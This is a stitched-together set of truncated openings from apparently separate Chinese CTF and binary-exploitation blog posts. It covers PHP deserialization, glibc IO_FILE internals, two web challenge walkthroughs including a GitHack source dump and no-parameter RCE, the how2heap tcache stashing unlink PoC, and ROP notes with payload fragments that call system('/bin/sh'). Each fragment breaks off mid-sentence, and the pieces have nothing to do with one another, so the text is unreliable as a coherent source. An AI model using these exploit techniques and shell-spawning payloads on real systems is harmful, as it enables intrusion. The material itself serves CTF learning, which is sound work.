[toc] 1.反序列化 Demo: <?php class test { private $flag = "flag{233}"; protected $ccc = "ccc"; public $a = "aaa"; static $b = "bbb"; } $test = new test; $data = serialize($test); echo $data; ?> out: O:4:"test":3:{s:10:"testflag";s:9:"flag{233}";s:6:"*ccc";s:3:"ccc";s:1:"a";s:3:"aaa";} 注意这里testflag长度为8，但序列化的显示确是10，可以抓包一下： 可以看到其实类名的前后有不可见字符，其实就是%00，这是因为flag是private，

[TOC] 开始干__IO_FILE。会依次调fopen,fwrite,fread之类的IO函数的源码。 IO_FILE之fopen详解 demo程序 ##include<stdio.h> int main() { FILE*fp=fopen("test","wb"); char *ptr=malloc(0x20); return 0; }源码分析 跟进去之后可以看到fopen实际是_IO_new_fopen函数。它调用的是

[toc] 0x30.[WUSTCTF2020]朴实无华(审计) robots找到个文件fAke_f1agggg.php，假的flag，查看头，找到fl4g.php。 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想

[toc] 0x20.[GXYCTF2019]禁止套娃 考点是无参数RCE先贴两个链接： https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E4%BB%80%E4%B9%88%E6%98%AF%E6%97%A0%E5%8F%82%E6%95%B0%E5%87%BD%E6%95%B0RCE http://www.heetian.com/info/827 找了半天没发现啥，看wp说是git泄露，然后 ┌──(kali㉿kali)-[~/GitHack] └─$ python GitHack.py http://25ced3f5-75c8-4ac6-9d2c-9097371101ca.node4.buuoj.cn:81/ [+] Download and parse index file ... error: Not a Git index file ┌──(kali㉿kali

代码是how2heap中libc2.27的代码 ##include <stdio.h> ##include <stdlib.h> ##include <assert.h> int main(){ unsigned long stack_var[0x10] = {0}; unsigned long *chunk_lis[0x10] = {0}; unsigned long *target; setbuf(stdout, NULL); printf("This file demonstrates the stashing unlink attack on tcache.\n\n"); printf("This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n"); printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n"); printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to

[toc] 1.杂 Ubuntu 18下偶尔会发生栈无法对齐的情况，多retn几次就好了。 strlen()函数来判断输入的长度，遇到'\x00'时会终止，而gets()函数遇到'\x00'并不会截断 sys,write,puts,printf system("/binsh") p32(e.plt['system']) + p32(0xdeadbeef) + p32(sh_addr) p64(pop_rdi_ret) + p64(sh_addr) + p64(e.sym['system']) p64(pop_rdi_ret) + p64(bin_sh) + p64(sys_plt) + p64(0xdeadbeef)